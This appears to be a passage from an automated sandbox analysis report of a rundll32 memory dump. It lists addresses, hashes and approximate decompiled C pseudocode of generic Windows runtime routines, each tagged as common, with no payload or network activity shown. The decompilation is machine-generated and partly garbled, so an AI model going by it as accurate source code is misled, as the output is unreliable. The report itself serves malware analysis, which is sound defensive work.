                                                                                            0x045d9198
                                                                                            0x045d9198
                                                                                            0x045d9198
                                                                                            0x045d919a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463371f
                                                                                            0x04633721
                                                                                            0x04633727
                                                                                            0x0463372f
                                                                                            0x04633733
                                                                                            0x04633735
                                                                                            0x04633738
                                                                                            0x0463373b
                                                                                            0x0463373d
                                                                                            0x04633740
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04633746
                                                                                            0x04633749
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463374f
                                                                                            0x04633751
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04633757
                                                                                            0x04633759
                                                                                            0x0463375c
                                                                                            0x0463375c
                                                                                            0x0463375e
                                                                                            0x0463375e
                                                                                            0x04633761
                                                                                            0x04633764
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04633766
                                                                                            0x04633768
                                                                                            0x046337a3
                                                                                            0x046337a3
                                                                                            0x046337a5
                                                                                            0x046337a7
                                                                                            0x046337ad
                                                                                            0x046337b0
                                                                                            0x046337b2
                                                                                            0x046337bc
                                                                                            0x046337c2
                                                                                            0x046337c2
                                                                                            0x046337b2
                                                                                            0x045d9187
                                                                                            0x045d9187
                                                                                            0x045d918a
                                                                                            0x045d918d
                                                                                            0x045d918f
                                                                                            0x045d9192
                                                                                            0x045d9195
                                                                                            0x00000000
                                                                                            0x045d9195
                                                                                            0x00000000
                                                                                            0x045d9187
                                                                                            0x0463376a
                                                                                            0x0463376a
                                                                                            0x0463376c
                                                                                            0x0463376c
                                                                                            0x0463376f
                                                                                            0x04633775
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04633777
                                                                                            0x04633779
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04633782
                                                                                            0x04633787
                                                                                            0x04633789
                                                                                            0x04633790
                                                                                            0x04633790
                                                                                            0x0463378b
                                                                                            0x0463378b
                                                                                            0x0463378b
                                                                                            0x04633792
                                                                                            0x04633795
                                                                                            0x04633795
                                                                                            0x04633798
                                                                                            0x04633798
                                                                                            0x0463379b
                                                                                            0x0463379b
                                                                                            0x045d91a3
                                                                                            0x045d91a9
                                                                                            0x045d91b0
                                                                                            0x045d91b4
                                                                                            0x045d91b4
                                                                                            0x045d91bb
                                                                                            0x045d91c0
                                                                                            0x045d91c5
                                                                                            0x045d91c7
                                                                                            0x046337da
                                                                                            0x045d91cd
                                                                                            0x045d91cd
                                                                                            0x045d91cd
                                                                                            0x045d91d2
                                                                                            0x045d91d5
                                                                                            0x045d9239
                                                                                            0x045d9239
                                                                                            0x045d91d7
                                                                                            0x045d91db
                                                                                            0x045d91e1
                                                                                            0x045d91e7
                                                                                            0x045d91fd
                                                                                            0x045d9203
                                                                                            0x045d921e
                                                                                            0x045d9223
                                                                                            0x00000000
                                                                                            0x045d9223
                                                                                            0x045d9205
                                                                                            0x045d9208
                                                                                            0x045d920c
                                                                                            0x045d9214
                                                                                            0x045d9214
                                                                                            0x045d91e9
                                                                                            0x045d91e9
                                                                                            0x045d91ee
                                                                                            0x045d91f3
                                                                                            0x045d91f3
                                                                                            0x045d91f3
                                                                                            0x045d91e7
                                                                                            0x00000000
                                                                                            0x045d91db
                                                                                            0x045d9187
                                                                                            0x045d9168

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c815fe22c5b216c3c6b3ebd1297c4d6f13968f3608e1dbd0d6c87b8db75fc697
                                                                                            • Instruction ID: 8cf8a99df5fe2e833df78435bc8313ed2a9364b7b8655fb9d5140dd261b834fe
                                                                                            • Opcode Fuzzy Hash: c815fe22c5b216c3c6b3ebd1297c4d6f13968f3608e1dbd0d6c87b8db75fc697
                                                                                            • Instruction Fuzzy Hash: A131A0B1A01685DFEB35EFACD4887ADB7B1BF88314F188549D40467341E334B980EB56
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04601DB5 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 60%
                                                                                            			E04601DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E045FF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L045F4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E045FF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                            0x04601dc2
                                                                                            0x04601dc5
                                                                                            0x04601dc7
                                                                                            0x04601dcc
                                                                                            0x04601dce
                                                                                            0x04601dd6
                                                                                            0x04601ddf
                                                                                            0x04601de0
                                                                                            0x04601de1
                                                                                            0x04601de5
                                                                                            0x04601de8
                                                                                            0x04601def
                                                                                            0x04601df0
                                                                                            0x04601df6
                                                                                            0x04601df7
                                                                                            0x04601dfe
                                                                                            0x04601e1a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04601e0b
                                                                                            0x04601e12
                                                                                            0x04601e12
                                                                                            0x04601e00
                                                                                            0x04601e00
                                                                                            0x04601e05
                                                                                            0x04601e1e
                                                                                            0x04601e23
                                                                                            0x0464570f
                                                                                            0x04645713
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645719
                                                                                            0x04645719
                                                                                            0x04601e2c
                                                                                            0x04601e2d
                                                                                            0x04601e2e
                                                                                            0x04601e2f
                                                                                            0x04601e31
                                                                                            0x04601e32
                                                                                            0x04601e35
                                                                                            0x04601e3d
                                                                                            0x04645723
                                                                                            0x0464573d
                                                                                            0x0464573d
                                                                                            0x00000000
                                                                                            0x04645723
                                                                                            0x04601e49
                                                                                            0x04601e4e
                                                                                            0x04601e4e
                                                                                            0x04601e09
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                            • Instruction ID: e78af5c453955b593c314ec8ce4ee4ae1c622d930cdda3f4adfe7825950eb1af
                                                                                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                            • Instruction Fuzzy Hash: 83216072600219AFD725CF59CC80EAFBBB9EF86744F118065E90597250EA35BE41D790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045F0050 Relevance: .1, Instructions: 81COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 53%
                                                                                            			E045F0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x46cd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04609ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0461B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E046A8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04609702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x46cb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                            0x045f0055
                                                                                            0x045f005d
                                                                                            0x045f0062
                                                                                            0x045f006c
                                                                                            0x045f006f
                                                                                            0x045f0074
                                                                                            0x045f007a
                                                                                            0x045f007a
                                                                                            0x045f0080
                                                                                            0x045f0080
                                                                                            0x045f0087
                                                                                            0x045f008d
                                                                                            0x045f008f
                                                                                            0x045f0093
                                                                                            0x045f0095
                                                                                            0x045f009b
                                                                                            0x045f00f8
                                                                                            0x045f00fb
                                                                                            0x045f00fc
                                                                                            0x045f00ff
                                                                                            0x045f0108
                                                                                            0x045f0108
                                                                                            0x045f00a2
                                                                                            0x045f00a6
                                                                                            0x045f00b3
                                                                                            0x045f00bc
                                                                                            0x045f00c5
                                                                                            0x045f00ca
                                                                                            0x0463c01e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463c02d
                                                                                            0x045f00d5
                                                                                            0x045f00d9
                                                                                            0x0463c03d
                                                                                            0x0463c046
                                                                                            0x0463c046
                                                                                            0x045f00df
                                                                                            0x045f00e2
                                                                                            0x045f00ea
                                                                                            0x045f00ef
                                                                                            0x045f00f2
                                                                                            0x045f00f6
                                                                                            0x045f0111
                                                                                            0x045f0117
                                                                                            0x045f0117
                                                                                            0x00000000
                                                                                            0x045f00f6
                                                                                            0x045f00d0
                                                                                            0x045f00d0
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f58c8ace1e3e2d0376151f86e31a838407b85fd6dd432822008606a055ed1c2c
                                                                                            • Instruction ID: cae088536e047385be808dc4490fe7a5927ed63fdcb097fefd8a3dcf783eb45b
                                                                                            • Opcode Fuzzy Hash: f58c8ace1e3e2d0376151f86e31a838407b85fd6dd432822008606a055ed1c2c
                                                                                            • Instruction Fuzzy Hash: E9317C31601A448FD725CF28D844B5AB3E5FF88B18F18456DE99687B91EB35BC01DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04656C0A Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E04656C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E045F7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x46c7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L045F4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0461F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E045F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04619AE0();
						_t23 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                            0x04656c0a
                                                                                            0x04656c0f
                                                                                            0x04656c10
                                                                                            0x04656c13
                                                                                            0x04656c15
                                                                                            0x04656c19
                                                                                            0x04656c1c
                                                                                            0x04656c21
                                                                                            0x04656c28
                                                                                            0x04656c3a
                                                                                            0x04656c2a
                                                                                            0x04656c33
                                                                                            0x04656c33
                                                                                            0x04656c3f
                                                                                            0x04656c48
                                                                                            0x04656c4d
                                                                                            0x04656c60
                                                                                            0x04656c65
                                                                                            0x04656c69
                                                                                            0x04656c73
                                                                                            0x04656c79
                                                                                            0x04656c7f
                                                                                            0x04656c86
                                                                                            0x04656c90
                                                                                            0x04656c94
                                                                                            0x04656ca6
                                                                                            0x04656cb2
                                                                                            0x04656cbd
                                                                                            0x04656cbd
                                                                                            0x04656cc3
                                                                                            0x04656cc7
                                                                                            0x04656ccb
                                                                                            0x04656cd0
                                                                                            0x04656cd1
                                                                                            0x04656ce2
                                                                                            0x04656ce2
                                                                                            0x04656c69
                                                                                            0x04656ced

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7abf767da6c66bd9df77e9590bed86fa81a1f80757f82f648ab6106b34fea33f
                                                                                            • Instruction ID: 0c1674396db6f35ca3beaffd4cc064f8af1133f17d7b167c2a400faa4385b787
                                                                                            • Opcode Fuzzy Hash: 7abf767da6c66bd9df77e9590bed86fa81a1f80757f82f648ab6106b34fea33f
                                                                                            • Instruction Fuzzy Hash: BB21BAB1A00645AFD715DF68D880F6AB7B8FF48704F14006AF908CB7A1E634ED10CBA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046190AF Relevance: .1, Instructions: 76COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E046190AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0462D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0460E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L045F4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0461F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0460A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                            0x046190af
                                                                                            0x046190b8
                                                                                            0x046190bb
                                                                                            0x046190bf
                                                                                            0x046190c2
                                                                                            0x046190c2
                                                                                            0x046190c8
                                                                                            0x046190cb
                                                                                            0x046190cd
                                                                                            0x046514d7
                                                                                            0x046514eb
                                                                                            0x046514eb
                                                                                            0x00000000
                                                                                            0x046514eb
                                                                                            0x046514db
                                                                                            0x046514e6
                                                                                            0x00000000
                                                                                            0x046514f2
                                                                                            0x046514e8
                                                                                            0x00000000
                                                                                            0x046514e8
                                                                                            0x046190d8
                                                                                            0x046190da
                                                                                            0x046190dd
                                                                                            0x046190e5
                                                                                            0x00000000
                                                                                            0x04619139
                                                                                            0x046190fa
                                                                                            0x046190fe
                                                                                            0x04619142
                                                                                            0x00000000
                                                                                            0x04619142
                                                                                            0x04619104
                                                                                            0x04619107
                                                                                            0x0461910b
                                                                                            0x04619110
                                                                                            0x04619118
                                                                                            0x04619147
                                                                                            0x04619148
                                                                                            0x0461914f
                                                                                            0x04619150
                                                                                            0x04619151
                                                                                            0x04619152
                                                                                            0x04619156
                                                                                            0x0461915d
                                                                                            0x04619160
                                                                                            0x04619168
                                                                                            0x0461916c
                                                                                            0x046191bc
                                                                                            0x046191be
                                                                                            0x00000000
                                                                                            0x046191be
                                                                                            0x0461916e
                                                                                            0x04619173
                                                                                            0x04619176
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0461917c
                                                                                            0x04619180
                                                                                            0x046191b5
                                                                                            0x00000000
                                                                                            0x046191b5
                                                                                            0x04619182
                                                                                            0x04619185
                                                                                            0x04619189
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0461918e
                                                                                            0x04619190
                                                                                            0x04619198
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046191a0
                                                                                            0x00000000
                                                                                            0x046191ad
                                                                                            0x046191ad
                                                                                            0x046191b0
                                                                                            0x046191b1
                                                                                            0x00000000
                                                                                            0x04619185
                                                                                            0x0461911a
                                                                                            0x0461911c
                                                                                            0x0461911f
                                                                                            0x04619125
                                                                                            0x04619127
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                            • Instruction ID: d4e94b6012b7bebd9dd0c286489d6a2dca88e7fac9930e2f06adac1739bb5a26
                                                                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                            • Instruction Fuzzy Hash: 182171B1A00305EFDB20DF55C845A9AF7F8EB54314F14886AE94597360E330FD44CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04603B7A Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 59%
                                                                                            			E04603B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x46c84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x46c84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x46c84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0461AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0461FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x46c84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x46c84c4; // 0x0
					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                            0x04603b89
                                                                                            0x04603b96
                                                                                            0x04603ba1
                                                                                            0x04603bab
                                                                                            0x04603bb5
                                                                                            0x04603bb9
                                                                                            0x04646298
                                                                                            0x04603bbf
                                                                                            0x04603bc2
                                                                                            0x04603bc3
                                                                                            0x04603bc9
                                                                                            0x04603bca
                                                                                            0x04603bcc
                                                                                            0x04603bcd
                                                                                            0x04603bd4
                                                                                            0x04603bd6
                                                                                            0x04603bdb
                                                                                            0x04603bea
                                                                                            0x04603bf7
                                                                                            0x04603bfb
                                                                                            0x04603bff
                                                                                            0x04603c09
                                                                                            0x04603c0a
                                                                                            0x04603c0b
                                                                                            0x04603c0f
                                                                                            0x04603c14
                                                                                            0x04603c18
                                                                                            0x04603c18
                                                                                            0x04603bfb
                                                                                            0x04603c1b
                                                                                            0x04603c30
                                                                                            0x04603c30
                                                                                            0x04603c3d

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 27852c29ae371215fab0b40ab92ad814a95caa7b8400a81fcb91d051e6380e7b
                                                                                            • Instruction ID: 84a7c4dfa02ed06b6ad875cb890f62b708cc35ea7abdbcf586c23105595ba90f
                                                                                            • Opcode Fuzzy Hash: 27852c29ae371215fab0b40ab92ad814a95caa7b8400a81fcb91d051e6380e7b
                                                                                            • Instruction Fuzzy Hash: E721B0B2600104AFD714EF58CD81B6AB7BDFB44309F154068EA08AB251E375BD55DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04656CF0 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E04656CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E045F7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E045F7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x45b5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0460F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0460F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04657016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L045F2400( &_v52);
								}
								_t21 = L045F2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                            0x04656cfb
                                                                                            0x04656d00
                                                                                            0x04656d02
                                                                                            0x04656d06
                                                                                            0x04656d0a
                                                                                            0x04656d0e
                                                                                            0x04656d19
                                                                                            0x04656d2b
                                                                                            0x04656d1b
                                                                                            0x04656d24
                                                                                            0x04656d24
                                                                                            0x04656d33
                                                                                            0x04656d39
                                                                                            0x04656d46
                                                                                            0x04656d4f
                                                                                            0x04656d61
                                                                                            0x04656d51
                                                                                            0x04656d5a
                                                                                            0x04656d5a
                                                                                            0x04656d69
                                                                                            0x04656d6b
                                                                                            0x04656d6d
                                                                                            0x04656d6f
                                                                                            0x04656d6f
                                                                                            0x04656d74
                                                                                            0x04656d79
                                                                                            0x04656d7a
                                                                                            0x04656d7f
                                                                                            0x04656d82
                                                                                            0x04656d88
                                                                                            0x04656d89
                                                                                            0x04656d90
                                                                                            0x04656d94
